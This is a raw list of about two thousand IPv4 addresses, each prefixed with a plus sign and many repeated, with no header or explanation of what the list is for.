+189.210.155.140 +183.88.214.182 +183.88.214.182 +187.19.100.241 +183.88.214.182 +183.88.214.182 +45.236.240.90 +45.237.203.16 +183.88.214.182 +191.184.228.97 +183.88.214.182 +183.88.214.182 +183.88.214.182 +54.209.116.220 +183.88.214.182 +183.88.214.182 +183.88.214.182 +18.209.254.210 +183.88.214.182 +183.88.214.182 +201.68.169.45 +183.88.214.182 +45.236.240.90 +105.97.67.177 +45.236.240.90 +183.88.214.182 +45.236.240.90 +191.35.79.104 +183.88.214.182 +183.88.214.182 +177.22.36.236 +45.236.240.90 +41.99.111.51 +160.176.122.92 +183.88.214.182 +183.88.214.182 +189.112.185.201 +45.236.240.90 +41.99.66.186 +37.104.99.151 +45.236.240.90 +186.54.216.65 +183.88.214.182 +139.112.129.92 +41.251.134.236 +183.88.214.182 +45.236.240.90 +171.22.25.127 +45.236.240.90 +171.22.25.127 +183.88.214.182 +177.134.167.170 +183.88.214.182 +186.242.72.81 +183.88.214.182 +45.236.240.90 +183.88.214.182 +183.88.214.182 +186.54.81.219 +45.236.240.90 +85.35.97.218 +183.88.214.182 +60.51.17.241 +45.236.240.90 +82.213.48.150 +183.88.214.182 +113.193.191.37 +191.34.231.170 +177.126.153.102 +186.214.33.181 +177.205.80.118 +41.96.134.251 +3.6.197.244 +18.211.178.64 +142.217.200.196 +181.97.221.73 +41.98.249.33 +177.154.217.182 +167.57.149.171 +37.104.92.180 +186.57.112.128 +179.162.107.234 +177.97.114.92 +59.88.182.10 +168.232.152.132 +117.207.74.149 +41.143.50.201 +124.82.84.156 +105.99.89.220 +180.75.11.119 +186.48.91.102 +66.97.46.191 +117.200.145.215 +117.221.3.61 +117.202.138.210 +41.97.102.242 +54.225.86.32 +171.22.25.127 +117.221.247.0 +59.92.80.131 +117.213.66.16 +187.191.19.244 +117.193.206.172 +117.201.17.177 +117.201.23.182 +117.221.12.148 +117.201.22.206 +59.98.56.244 +46.21.94.158 +117.200.183.179 +40.80.93.142 +183.88.214.182 +183.88.214.182 +199.38.169.23 +183.88.214.182 +61.12.78.51 +183.88.214.182 +183.88.214.182 +183.88.214.182 +200.149.27.76 +45.236.240.90 +187.115.67.92 +183.88.214.182 +183.88.214.182 +52.60.74.188 +105.156.92.240 +216.17.18.144 +154.115.3.21 +45.236.240.90 +92.223.184.229 +183.88.214.182 +179.219.34.125 +201.22.148.88 +183.88.214.182 +168.196.16.116 +186.85.247.161 +188.39.111.67 +125.24.149.130 +183.88.214.182 +183.88.214.182 +218.111.151.89 +115.133.110.80 +52.55.188.92 +44.200.137.39 +189.41.247.138 +191.33.13.121 +183.88.214.182 +41.142.235.149 +183.88.214.182 +36.80.68.212 +183.88.214.182 +175.136.17.27 +183.88.214.182 +51.38.180.159 +54.225.86.32 +45.236.240.90 +45.236.240.90 +183.88.214.182 +18.211.178.64 +183.88.214.182 +95.51.128.245 +41.103.244.226 +45.179.75.91 +83.0.197.34 +179.26.232.61 +183.88.214.182 +183.88.214.182 +41.141.203.27 +37.104.72.160 +179.26.136.14 +183.88.214.182 +41.96.84.109 +41.142.80.195 +183.88.214.182 +187.21.48.105 +183.88.214.182 +117.201.15.141 +187.36.138.27 +183.88.214.182 +61.12.78.50 +183.88.214.182 +183.88.214.182 +187.34.78.228 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +185.113.50.140 +177.74.66.110 +183.88.214.182 +177.158.14.33 +191.32.38.27 +41.99.183.237 +180.75.8.163 +45.236.240.90 +177.10.197.141 +189.112.72.54 +115.87.177.1 +50.18.204.218 +167.57.249.182 +183.88.214.182 +45.236.240.90 +37.104.79.139 +183.88.214.182 +20.96.82.34 +41.99.31.34 +181.97.222.108 +177.206.70.56 +187.59.104.155 +177.50.189.17 +177.154.213.6 +189.154.41.111 +41.99.79.190 +200.214.44.213 +41.250.173.199 +41.220.193.38 +59.92.185.123 +45.236.240.90 +186.52.185.11 +105.156.31.86 +167.60.75.255 +117.221.6.207 +186.57.115.6 +117.202.138.47 +117.241.70.90 +88.119.154.115 +183.88.214.182 +179.191.239.235 +179.178.239.88 +54.193.202.22 +183.88.214.182 +183.88.214.182 +45.236.240.90 +183.88.214.182 +183.88.214.182 +183.88.214.182 +200.155.130.18 +183.88.214.182 +45.236.240.90 +45.236.240.90 +183.88.214.182 +191.35.39.244 +171.22.25.127 +183.88.214.182 +183.88.214.182 +186.210.30.237 +183.88.214.182 +183.88.214.182 +146.88.64.82 +70.186.250.230 +44.198.184.87 +94.99.112.156 +45.236.240.90 +183.88.214.182 +183.88.214.182 +183.88.214.182 +170.244.32.9 +183.88.214.182 +183.88.214.182 +183.88.214.182 +45.236.240.90 +171.22.25.127 +45.236.240.90 +212.55.219.126 +44.198.184.87 +200.179.75.143 +153.127.9.156 +43.224.139.171 +45.236.240.90 +105.157.132.144 +180.183.112.244 +45.236.240.90 +208.67.130.244 +43.224.139.175 +3.22.0.7 +45.236.240.90 +177.148.185.88 +13.38.101.71 +183.88.214.182 +183.88.214.182 +45.236.240.90 +171.22.25.127 +41.99.78.117 +41.96.188.155 +45.179.75.89 +186.48.255.61 +80.242.76.56 +196.77.31.167 +3.127.22.193 +45.236.240.90 +183.88.214.182 +171.22.25.127 +45.175.144.239 +191.221.217.83 +5.56.63.221 +45.236.240.90 +183.88.214.182 +45.236.240.90 +183.88.214.182 +45.236.240.90 +177.66.154.231 +154.115.3.1 +43.224.139.172 +183.88.214.182 +45.236.240.90 +168.176.195.109 +177.50.168.41 +41.99.121.241 +191.253.195.142 +167.56.72.43 +41.98.245.81 +117.221.13.32 +60.53.38.123 +177.101.110.217 +153.127.9.156 +200.187.170.106 +207.188.144.207 +80.89.213.222 +187.44.84.140 +45.236.240.90 +160.176.125.224 +105.155.44.48 +186.53.122.131 +59.95.161.134 +177.18.251.118 +138.118.149.200 +186.55.182.26 +186.52.112.222 +186.57.114.222 +59.92.101.252 +167.56.80.255 +183.88.214.182 +200.75.18.27 +183.88.214.182 +183.88.214.182 +213.168.177.66 +117.222.143.44 +191.190.69.129 +183.88.214.182 +201.43.246.4 +15.160.48.221 +186.248.93.43 +125.27.176.66 +183.88.214.182 +183.88.214.182 +183.88.214.182 +13.49.80.47 +199.66.220.186 +115.133.55.95 +216.238.16.162 +149.202.41.22 +183.88.214.182 +202.137.22.30 +43.224.139.177 +109.69.188.66 +179.95.83.112 +187.39.15.14 +54.73.18.31 +18.229.186.133 +186.52.146.25 +183.88.214.182 +183.88.214.182 +183.88.214.182 +54.154.217.190 +177.194.134.183 +45.236.240.90 +191.31.96.196 +168.90.168.50 +45.236.240.90 +61.94.199.236 +183.88.214.182 +58.26.53.48 +216.238.16.180 +216.238.16.162 +216.238.16.163 +196.92.147.18 +3.0.58.134 +179.95.198.165 +182.71.76.99 +183.88.214.182 +54.242.217.100 +183.88.214.182 +1.9.214.188 +80.89.213.222 +124.120.143.58 +45.236.240.90 +18.133.74.219 +13.244.97.43 +183.88.214.182 +117.221.138.1 +182.176.47.55 +183.88.214.182 +191.54.63.155 +216.238.16.163 +94.230.19.45 +94.230.19.50 +41.96.223.41 +183.88.214.182 +41.99.92.146 +105.156.108.172 +45.236.240.90 +168.232.152.101 +201.16.184.95 +194.78.211.169 +45.236.240.90 +196.92.138.208 +45.236.240.90 +201.8.160.194 +34.200.18.78 +15.160.179.104 +183.88.214.182 +189.2.181.180 +54.242.217.100 +143.208.173.138 +219.74.176.185 +45.236.240.90 +186.48.124.102 +183.88.214.182 +45.236.240.90 +183.88.214.182 +177.177.91.127 +183.88.214.182 +52.19.32.2 +186.210.91.1 +179.26.77.254 +216.238.16.162 +177.18.155.7 +186.57.108.85 +186.48.52.209 +170.0.44.251 +177.50.183.77 +177.133.38.96 +186.50.242.21 +189.34.148.116 +105.154.204.42 +41.97.74.141 +3.7.229.229 +41.97.247.55 +167.60.195.27 +196.65.102.27 +216.238.16.180 +216.238.16.163 +187.111.21.21 +15.222.7.217 +199.66.220.186 +191.37.3.210 +191.253.106.118 +191.32.31.27 +191.252.0.101 +186.48.79.133 +117.194.134.1 +186.210.94.210 +45.236.240.90 +179.176.206.123 +117.241.86.79 +186.249.201.227 +183.88.214.182 +91.228.9.178 +177.159.75.138 +183.88.214.182 +45.236.240.90 +187.59.237.241 +183.88.214.182 +41.140.161.94 +200.96.181.212 +45.236.240.90 +183.88.214.182 +171.22.25.127 +177.249.164.23 +45.236.240.90 +69.46.7.35 +45.236.240.90 +45.236.240.90 +191.249.126.47 +183.88.214.182 +45.236.240.90 +45.236.240.90 +189.201.203.198 +175.139.204.96 +45.236.240.90 +171.22.25.127 +81.192.52.122 +52.205.124.237 +45.236.240.90 +14.207.2.115 +103.121.149.26 +216.207.192.64 +183.88.214.182 +183.88.214.182 +183.88.214.182 +177.193.187.239 +45.236.240.90 +183.88.214.182 +179.222.22.167 +191.254.37.77 +45.236.240.90 +179.185.68.141 +183.88.214.182 +177.73.71.118 +183.88.214.182 +191.241.246.62 +105.158.66.41 +45.236.240.90 +45.236.240.90 +183.88.214.182 +115.132.227.199 +202.188.122.221 +59.92.187.80 +132.255.147.34 +177.133.31.58 +193.108.160.160 +105.158.66.41 +183.88.214.182 +193.26.217.9 +189.5.126.61 +216.184.89.170 +201.22.160.251 +187.39.213.96 +52.205.124.237 +179.228.93.83 +186.138.66.199 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +170.84.39.38 +186.215.138.100 +41.97.184.196 +191.251.32.117 +187.18.108.29 +45.179.75.87 +187.32.109.53 +41.103.238.209 +45.236.240.90 +183.88.214.182 +183.88.214.182 +152.156.126.90 +183.88.214.182 +8.36.139.144 +197.204.146.236 +186.209.48.2 +41.251.194.80 +45.230.226.242 +179.26.77.182 +45.236.240.90 +186.213.242.240 +183.88.214.182 +177.16.195.39 +183.88.214.182 +18.130.217.169 +183.88.214.182 +15.222.234.202 +177.130.252.94 +183.88.214.182 +183.88.214.182 +183.88.214.182 +177.40.95.187 +186.214.222.114 +189.113.119.178 +189.139.167.10 +45.236.240.90 +177.184.12.69 +181.49.14.98 +52.67.203.7 +18.218.56.51 +45.236.240.90 +177.95.9.143 +18.214.64.35 +168.197.114.161 +41.230.1.4 +186.214.184.142 +54.247.118.243 +138.122.166.170 +179.162.108.84 +186.57.119.191 +190.134.15.221 +45.236.240.90 +31.216.41.86 +117.213.66.232 +177.191.249.9 +177.54.19.99 +59.92.180.193 +189.231.108.121 +117.202.139.25 +117.201.16.234 +203.223.190.112 +117.202.140.66 +41.96.193.76 +117.202.143.45 +59.92.94.189 +197.204.246.199 +117.193.212.13 +117.202.73.79 +59.96.192.174 +117.221.235.246 +117.217.216.42 +186.52.196.18 +61.2.72.206 +61.2.37.213 +117.201.14.3 +117.197.204.245 +117.221.15.168 +59.92.82.96 +168.197.114.161 +117.215.118.49 +41.96.125.193 +59.96.231.229 +168.197.114.161 +178.254.85.251 +219.95.70.172 +117.213.111.72 +117.193.202.177 +117.201.15.134 +186.251.180.84 +61.3.202.72 +117.197.203.1 +117.221.1.142 +117.213.109.244 +59.93.161.105 +117.194.132.161 +167.61.204.43 +59.96.228.199 +117.194.132.113 +61.1.154.152 +59.93.68.164 +59.93.68.120 +117.215.183.75 +117.221.13.17 +117.200.158.144 +117.193.69.50 +117.212.183.19 +159.69.198.221 +117.194.129.44 +117.206.129.228 +196.74.111.186 +168.197.114.161 +183.88.214.182 +170.83.44.127 +177.129.12.226 +183.88.214.182 +167.60.161.119 +191.35.73.122 +168.197.114.161 +186.211.95.7 +69.46.7.35 +183.88.214.182 +168.197.114.161 +168.197.114.161 +183.88.214.182 +168.197.114.161 +183.88.214.182 +168.197.114.161 +183.88.214.182 +118.127.118.242 +168.197.114.161 +183.88.214.182 +200.105.84.194 +189.27.24.39 +168.197.114.161 +183.88.214.182 +183.88.214.182 +177.200.202.66 +187.108.204.246 +14.207.4.80 +183.88.214.182 +20.101.52.139 +175.139.187.225 +216.17.18.128 +189.204.180.44 +117.202.47.77 +105.158.66.212 +85.90.3.53 +45.236.240.90 +3.89.190.54 +115.131.146.52 +183.88.214.182 +117.217.212.185 +183.88.214.182 +186.210.220.173 +168.197.114.161 +168.197.114.161 +138.219.192.102 +194.179.53.218 +183.88.214.182 +3.89.190.54 +201.89.245.18 +45.236.240.90 +3.89.232.136 +189.204.180.44 +60.50.145.66 +191.33.4.9 +110.138.210.21 +175.138.8.43 +186.206.169.166 +200.75.18.27 +189.59.59.237 +45.236.240.90 +85.90.3.53 +41.99.194.98 +46.170.126.178 +168.197.114.161 +91.228.9.178 +168.197.114.161 +124.120.88.114 +41.97.199.104 +197.204.19.94 +105.157.84.94 +164.177.34.101 +179.26.217.249 +183.88.214.182 +196.77.163.211 +168.197.114.161 +41.99.41.17 +168.197.114.161 +105.99.106.187 +179.24.242.194 +179.154.242.167 +168.197.114.161 +179.187.40.90 +183.88.214.182 +183.88.214.182 +117.194.135.169 +168.197.114.161 +45.236.240.90 +183.88.214.182 +183.88.214.182 +168.197.114.161 +74.198.134.134 +117.201.31.100 +117.212.190.150 +168.197.114.161 +45.236.240.90 +179.104.164.215 +45.236.240.90 +45.236.240.90 +183.88.214.182 +183.88.214.182 +183.88.214.182 +186.222.23.135 +168.197.114.161 +168.197.114.161 +41.99.76.39 +117.217.216.198 +180.75.70.199 +45.236.240.90 +186.52.140.78 +52.177.149.5 +190.136.128.119 +41.99.122.189 +177.154.218.78 +167.57.225.190 +183.88.214.182 +175.139.40.54 +105.102.237.234 +191.55.143.61 +186.215.61.10 +52.71.172.232 +179.183.20.133 +183.88.214.182 +189.63.220.206 +77.31.20.116 +75.101.247.177 +186.206.240.163 +196.65.139.56 +168.197.114.161 +45.236.240.90 +167.57.165.28 +177.50.177.39 +179.177.173.220 +179.252.27.162 +179.162.108.84 +175.138.64.26 +168.197.114.161 +181.213.41.116 +196.218.13.108 +168.197.114.161 +168.197.114.161 +183.88.214.182 +117.201.26.56 +179.181.81.20 +37.252.123.143 +117.200.152.130 +183.88.214.182 +177.94.205.223 +187.58.193.229 +201.76.188.26 +183.88.214.182 +80.15.195.109 +168.197.114.161 +45.236.240.90 +183.88.214.182 +189.210.155.139 +200.57.228.89 +175.139.224.112 +45.236.240.90 +183.88.214.182 +3.89.232.136 +168.197.114.161 +45.236.240.90 +45.236.240.90 +45.236.240.90 +183.88.214.182 +189.5.157.156 +203.115.196.131 +59.99.209.155 +191.185.135.19 +200.75.18.27 +191.33.88.250 +45.236.240.90 +201.43.246.90 +183.88.214.182 +189.5.157.253 +3.228.5.22 +189.19.167.232 +41.96.168.117 +45.236.240.90 +45.236.240.90 +210.118.123.104 +168.197.114.161 +183.88.214.182 +91.216.103.152 +183.88.214.182 +91.216.103.141 +41.140.164.51 +175.141.46.254 +110.4.40.83 +168.197.114.161 +183.88.214.182 +82.137.249.236 +175.143.89.54 +103.161.92.102 +183.88.214.182 +168.197.114.161 +59.92.95.214 +177.46.143.191 +183.88.214.182 +45.236.240.90 +45.236.240.90 +179.24.213.9 +105.99.123.71 +131.196.100.208 +41.103.244.238 +95.51.128.244 +34.226.71.76 +138.94.109.148 +170.83.44.74 +37.104.90.165 +75.101.247.177 +177.85.225.221 +41.99.94.162 +77.31.26.252 +168.197.114.161 +164.163.239.99 +183.88.214.182 +189.25.96.199 +183.88.214.182 +168.197.114.161 +168.197.114.161 +168.197.114.161 +82.71.212.133 +216.207.192.197 +183.88.214.182 +179.187.243.101 +117.202.138.208 +183.88.214.182 +183.88.214.182 +183.88.214.182 +45.236.240.90 +170.79.250.254 +183.88.214.182 +179.83.30.216 +191.223.132.128 +200.157.34.82 +180.75.11.245 +34.226.71.76 +201.35.188.151 +189.114.35.228 +41.99.114.1 +189.114.46.144 +41.96.210.7 +186.54.212.30 +179.83.185.21 +50.112.52.21 +171.22.25.127 +45.236.240.90 +186.57.105.173 +105.102.181.123 +186.55.176.219 +131.221.64.66 +168.197.114.161 +168.197.114.161 +45.236.240.90 +189.57.216.211 +82.190.118.149 +183.88.214.182 +183.88.214.182 +177.202.114.113 +13.208.245.117 +45.236.240.90 +117.213.68.123 +189.210.155.138 +168.197.114.161 +189.46.153.222 +183.88.214.182 +117.221.242.101 +183.88.214.182 +194.177.203.105 +168.197.114.161 +45.236.240.90 +183.88.214.182 +177.41.81.41 +201.16.166.190 +177.205.126.61 +191.33.69.12 +209.145.53.19 +45.236.240.90 +191.251.92.93 +183.88.214.182 +52.4.228.8 +183.88.214.182 +119.2.118.103 +189.63.86.34 +54.90.174.203 +183.88.214.182 +171.22.25.127 +180.183.116.210 +183.88.214.182 +168.197.114.161 +77.75.102.51 +45.236.240.90 +3.234.45.125 +168.197.114.161 +187.19.165.125 +2.37.230.115 +45.236.240.90 +168.197.114.161 +168.197.114.161 +168.197.114.161 +168.197.114.161 +183.88.214.182 +168.197.114.161 +115.133.195.67 +54.90.174.203 +200.158.183.8 +191.33.4.219 +20.42.104.203 +45.236.240.90 +52.45.42.245 +178.254.109.27 +45.236.240.90 +183.88.214.182 +200.123.26.73 +54.224.88.107 +41.142.71.178 +125.164.144.172 +200.17.233.226 +175.136.16.239 +183.88.214.182 +199.101.246.201 +199.101.246.209 +183.88.214.182 +183.88.214.182 +52.4.228.8 +168.197.114.161 +187.40.81.158 +91.224.13.39 +189.63.27.104 +185.29.79.194 +183.88.214.182 +45.236.240.90 +168.197.114.161 +168.197.114.161 +168.197.114.161 +45.236.240.90 +183.88.214.182 +45.236.240.90 +183.88.214.182 +185.56.8.197 +45.236.240.90 +45.236.240.90 +45.236.240.90 +18.191.44.215 +212.125.32.59 +189.103.108.41 +200.185.228.167 +117.193.21.82 +189.231.125.79 +183.88.214.182 +45.236.240.90 +196.64.73.178 +168.197.114.161 +54.80.24.187 +45.236.240.90 +191.33.31.82 +183.88.214.182 +45.236.240.90 +179.0.206.58 +83.0.71.161 +187.65.151.19 +45.236.240.90 +177.98.240.195 +89.231.198.103 +187.21.59.6 +46.186.42.159 +183.88.214.182 +37.104.72.1 +183.88.214.182 +124.120.87.187 +197.204.47.42 +179.26.67.244 +186.210.93.116 +183.88.214.182 +186.202.136.88 +45.236.240.90 +183.88.214.182 +191.185.140.149 +45.236.240.90 +91.216.103.140 +183.88.214.182 +121.123.39.154 +187.113.19.25 +41.98.11.27 +186.214.234.227 +183.88.214.182 +160.177.151.22 +45.236.240.90 +171.22.25.127 +69.47.57.54 +45.236.240.90 +54.145.109.223 +152.250.250.96 +183.88.214.182 +89.187.66.107 +45.236.240.90 +117.202.65.181 +190.19.113.207 +59.91.148.240 +41.96.21.250 +117.201.18.249 +41.96.250.116 +59.96.226.250 +117.221.8.74 +183.88.214.182 +117.200.77.221 +117.221.13.48 +117.221.12.234 +179.176.111.103 +117.201.28.223 +117.221.13.234 +59.88.181.133 +59.93.163.120 +117.200.187.189 +181.24.154.218 +207.188.145.120 +117.222.142.250 +117.201.23.166 +61.3.202.134 +59.88.182.222 +117.193.213.164 +79.61.35.232 +117.213.39.206 +189.154.130.217 +117.201.31.18 +117.222.140.125 +183.88.214.182 +177.50.174.176 +183.88.214.182 +179.27.158.24 +46.21.94.158 +213.190.70.119 +213.190.70.200 +179.184.129.82 +167.60.219.135 +68.188.65.6 +170.0.46.133 +5.172.190.16 +121.58.242.66 +189.112.81.250 +37.104.64.61 +187.32.161.108 +34.202.72.163 +177.154.195.137 +76.190.105.248 +196.70.55.73 +34.233.52.147 +179.162.29.253 +197.204.119.67 +54.204.60.43 +186.113.7.95 +54.212.213.149 +183.88.214.182 +187.58.179.16 +81.44.174.232 +175.139.187.225 +179.176.106.42 +177.98.170.44 +45.236.240.90 +183.88.214.182 +186.1.161.70 +191.250.55.129 +45.236.240.90 +183.88.214.182 +200.187.176.222 +189.91.227.17 +183.88.214.182 +177.100.209.228 +191.251.55.196 +170.145.102.18 +196.70.120.49 +177.19.218.21 +187.58.27.234 +45.236.240.90 +179.84.70.63 +45.236.240.90 +60.53.6.149 +200.236.12.2 +44.197.208.62 +74.198.132.134 +80.17.46.114 +54.144.227.226 +189.50.113.239 +45.236.240.90 +189.78.197.251 +105.159.180.33 +191.186.193.164 +45.236.240.90 +47.88.56.146 +180.247.232.6 +41.98.245.187 +79.188.136.130 +160.179.86.178 +187.39.41.34 +49.248.108.180 +187.58.58.37 +160.176.238.47 +3.96.212.113 +3.144.225.225 +45.236.240.90 +197.204.44.43 +177.75.8.22 +41.97.103.124 +41.103.240.75 +45.179.75.124 +45.236.240.90 +45.236.240.90 +45.175.144.242 +212.156.94.134 +85.89.40.162 +74.113.41.254 +189.89.152.106 +191.31.26.164 +45.236.240.90 +186.113.6.115 +181.213.49.93 +177.191.55.72 +45.236.240.90 +54.233.167.50 +197.204.192.227 +117.212.180.234 +59.92.91.195 +54.94.111.193 +179.162.190.179 +117.216.9.51 +52.67.122.23 +117.202.186.152 +59.89.207.147 +190.134.217.9 +117.212.182.243 +117.201.20.184 +59.91.157.46 +117.193.205.123 +117.194.132.255 +117.216.59.47 +59.92.82.158 +117.221.10.104 +117.201.0.7 +59.92.93.230 +181.24.149.75 +61.2.33.130 +59.92.94.70 +59.88.191.108 +59.92.82.40 +117.221.137.82 +59.92.237.154 +59.92.85.159 +117.221.12.107 +117.201.30.65 +59.91.147.194 +117.201.31.205 +59.89.193.123 +189.62.57.15 +59.91.152.89 +61.3.201.90 +177.133.12.46 +61.3.241.92 +77.31.17.4 +117.193.67.252 +117.221.14.212 +59.88.177.132 +59.93.68.60 +117.213.105.130 +59.92.89.138 +200.175.174.43 +61.1.155.107 +167.60.20.151 +117.221.12.242 +177.206.141.103 +117.222.136.199 +41.140.74.71 +117.201.10.70 +117.201.18.126 +117.221.240.34 +59.91.146.80 +59.96.224.236 +117.222.139.88 +80.17.45.61 +59.88.185.129 +177.50.175.73 +117.213.106.93 +117.221.13.153 +117.200.155.36 +61.3.244.82 +117.221.11.13 +167.60.230.224 +80.17.46.40 +117.206.128.70 +177.191.0.128 +186.52.228.27 +117.194.139.47 +117.193.70.20 +41.103.226.20 +117.201.21.255 +45.76.161.13 +41.96.218.69 +117.221.243.185 +45.236.240.90 +117.200.159.187 +117.212.185.210 +117.207.65.234 +177.43.23.55 +172.104.60.88 +187.113.3.247 +197.204.162.42 +189.6.202.6 +115.133.80.104 +196.77.160.237 +45.236.240.90 +45.236.240.90 +41.103.226.20 +186.54.251.192 +195.13.216.117 +190.1.203.16 +179.214.17.190 +45.236.240.90 +103.204.80.206 +197.204.162.42 +93.39.92.169 +201.48.183.144 +189.112.108.201 +45.236.240.90 +41.103.253.237 +45.236.240.90 +179.187.91.237 +179.228.89.177 +60.53.38.114 +191.33.211.241 +177.43.233.31 +149.202.41.22 +185.160.48.228 +182.53.80.113 +216.17.18.154 +40.68.186.66 +160.177.151.59 +40.68.188.230 +3.91.17.155 +117.222.139.132 +202.70.64.172 +93.39.92.171 +188.52.13.19 +189.154.135.175 +13.229.34.124 +197.204.114.224 +201.48.142.88 +131.1.255.145 +45.189.119.97 +190.31.253.244 +175.140.73.12 +107.20.203.11 +3.91.17.155 +45.236.240.90 +54.147.11.217 +45.236.240.90 +189.46.142.191 +201.42.14.166 +54.147.11.217 +171.22.25.127 +45.236.240.90 +45.236.240.90 +202.70.64.172 +75.141.62.6 +179.219.44.249 +179.159.134.195 +18.211.178.157 +83.4.87.16 +217.165.11.51 +179.185.49.98 +170.0.44.245 +197.204.109.235 +177.63.208.171 +41.140.65.144 +177.235.18.216 +170.231.192.208 +64.146.172.55 +113.172.77.240 +52.2.39.162 +175.136.16.173 +79.231.232.133 +191.221.53.39 +52.26.232.177 +179.26.56.180 +20.101.52.139 +200.216.115.18 +188.52.46.10 +179.26.56.180 +189.4.3.169 +177.17.113.197 +45.236.240.90 +186.212.173.158 +168.232.154.33 +201.6.154.216 +122.160.11.12 +61.40.73.182 +41.99.4.208 +186.230.33.170 +179.26.210.246 +124.120.86.91 +45.236.240.90 +177.149.159.184 +179.179.136.69 +186.249.10.118 +177.94.51.146 +45.236.240.90 +50.79.67.9 +45.236.240.90 +45.236.240.90 +196.64.64.123 +171.22.25.127 +75.8.40.170 +52.2.39.162 +177.96.213.92 +167.61.250.133 +157.90.123.211 +177.206.46.233 +201.48.183.97 +181.24.153.55 +179.177.135.121 +162.55.51.57 +18.228.153.180 +177.205.86.144 +41.99.0.175 +189.154.103.140 +41.250.164.62 +177.204.228.70 +18.170.43.223 +45.236.240.90 +191.26.67.173 +12.24.255.160 +45.236.240.90 +45.236.240.90 +179.183.203.72 +177.43.158.84 +54.165.145.88 +177.194.138.118 +3.88.156.100 +192.41.83.132 +187.39.0.82 +187.9.130.253 +40.70.79.242 +177.158.2.155 +45.236.240.90 +187.180.94.96 +63.119.111.138 +180.75.8.67 +41.99.98.0 +45.236.240.90 +45.236.240.90 +18.208.134.114 +207.236.97.194 +179.181.125.122 +179.95.163.145 +110.139.76.92 +196.70.122.252 +187.56.91.112 +3.238.249.51 +45.236.240.90 +13.57.25.6 +201.47.185.228 +201.47.185.229 +45.236.240.90 +187.5.164.23 +45.236.240.90 +189.63.83.175 +191.35.245.92 +63.119.111.138 +180.183.113.25 +138.201.146.244 +179.191.239.123 +45.236.240.90 +45.236.240.90 +78.180.182.108 +45.236.240.90 +189.112.71.105 +177.19.178.158 +149.202.41.22 +200.141.174.132 +177.83.192.99 +5.35.254.187 +45.236.240.90 +79.188.26.226 +177.191.152.45 +45.236.240.90 +186.52.169.101 +164.52.210.96 +75.8.40.170 +103.204.80.206 +177.96.33.180 +200.164.222.162 +45.236.240.90 +45.236.240.90 +52.252.15.96 +191.250.8.43 +177.50.167.234 +187.10.95.215 +45.236.240.90 +171.22.25.127 +177.98.166.29 +44.202.33.132 +45.236.240.90 +45.236.240.90 +200.57.193.154 +3.236.112.37 +107.20.203.11 +72.24.104.202 +34.221.17.123 +66.171.93.30 +69.46.7.35 +12.24.255.161 +82.222.61.132 +45.236.240.90 +203.241.176.196 +13.56.111.247 +125.16.147.96 +200.162.249.105 +179.216.56.14 +24.128.225.157 +201.49.124.155 +45.236.240.90 +201.49.124.154 +186.52.214.82 +201.49.124.157 +105.154.41.58 +193.95.241.68 +60.50.150.223 +175.140.97.174 +195.57.124.107 +117.221.1.224 +112.78.137.130 +49.236.195.87 +179.216.216.17 +177.106.60.177 +177.133.40.148 +45.236.240.90 +45.236.240.90 +88.4.155.175 +45.236.240.90 +45.236.240.90 +177.18.28.202 +200.95.173.138 +189.63.28.62 +82.77.11.169 +45.236.240.90 +34.243.241.116 +187.107.163.32 +187.64.128.165 +190.196.31.142 +179.250.232.239 +45.236.240.90 +45.236.240.90 +45.236.240.90 +45.236.240.90 +191.215.72.162 +179.156.196.50 +3.93.40.34 +45.236.240.90 +170.83.45.98 +191.54.133.72 +45.236.240.90 +88.249.164.79 +45.236.240.90 +117.222.142.81 +177.205.36.140 +191.251.56.23 +179.232.228.235 +179.185.49.98 +181.191.206.66 +113.193.10.224 +171.22.25.127 +45.236.240.90 +41.74.113.50 +191.185.14.91 +180.183.125.5 +45.236.240.90 +207.179.181.43 +41.98.2.43 +179.27.154.9 +202.52.15.82 +41.96.114.23 +189.112.92.89 +41.202.224.20 +152.86.128.135 +177.132.129.117 +202.126.92.235 +201.47.185.227 +189.61.53.13 +159.148.9.245 +88.4.155.211 +191.191.129.94 +117.202.44.109 +179.191.84.154 +45.236.240.90 +50.195.186.85 +117.216.10.148 +45.236.240.90 +171.22.25.127 +189.89.178.102 +179.113.141.72 +189.110.204.37 +109.70.139.71 +201.0.184.29 +45.236.240.90 +201.47.185.230 +201.47.185.226 +122.160.11.12 +45.236.240.90 +179.216.52.180 +189.73.181.136 +45.236.240.90 +159.148.9.245 +189.61.86.54 +45.236.240.90 +115.134.194.193 +167.61.208.27 +109.70.138.242 +81.44.33.253 +13.244.119.137 +207.188.150.68 +186.214.217.80 +177.204.225.44 +189.72.206.146 +162.247.215.74 +13.246.41.100 +66.146.127.10 +177.133.161.133 +45.236.240.90 +117.222.142.3 +208.103.117.29 +117.213.35.114 +179.187.186.251 +117.222.141.84 +117.222.141.102 +59.88.179.47 +117.221.245.121 +59.99.211.51 +117.212.179.107 +117.241.71.212 +117.221.243.235 +117.201.28.189 +117.217.167.102 +59.96.193.239 +59.88.180.71 +37.104.71.43 +52.201.111.92 +59.92.185.231 +117.202.44.47 +117.213.65.235 +171.22.25.127 +117.222.142.189 +117.221.247.170 +59.92.85.8 +66.146.127.27 +117.212.185.69 +45.236.240.90 +59.96.192.221 +186.222.17.9 +117.202.138.46 +117.222.140.138 +117.222.140.153 +117.222.141.47 +3.227.229.41 +59.90.85.145 +59.96.227.101 +59.88.186.200 +124.82.99.141 +59.92.236.184 +117.213.39.192 +181.24.134.126 +117.202.45.2 +117.206.130.31 +117.201.19.173 +167.56.76.207 +59.92.237.15 +117.221.15.69 +167.57.160.59 +117.201.21.184 +117.222.136.178 +177.205.43.200 +194.176.109.158 +41.96.248.171 +66.146.127.27 +124.41.214.49 +3.95.212.40 +216.207.192.150 +103.139.166.21 +180.183.114.165 +195.57.124.107 +149.202.41.22 +179.95.90.30 +52.45.21.72 +196.64.79.184 +3.97.251.249 +200.146.221.156 +164.177.34.101 +191.33.178.210 +186.202.182.191 +109.70.138.236 +12.24.255.163 +202.137.3.247 +12.24.255.165 +12.24.255.167 +45.236.240.90 +177.10.197.141 +45.236.240.90 +54.146.108.165 +191.33.14.225 +189.61.17.231 +201.45.78.146 +110.159.137.31 +36.74.154.234 +66.146.127.10 +54.81.175.67 +3.227.229.41 +54.81.175.67 +202.188.219.216 +3.95.212.40 +194.176.109.158 +177.100.216.167 +177.204.170.4 +47.34.189.157 +124.120.96.7 +45.162.68.29 +41.98.19.160 +45.236.240.90 +171.22.25.127 +177.50.167.42 +160.178.44.148 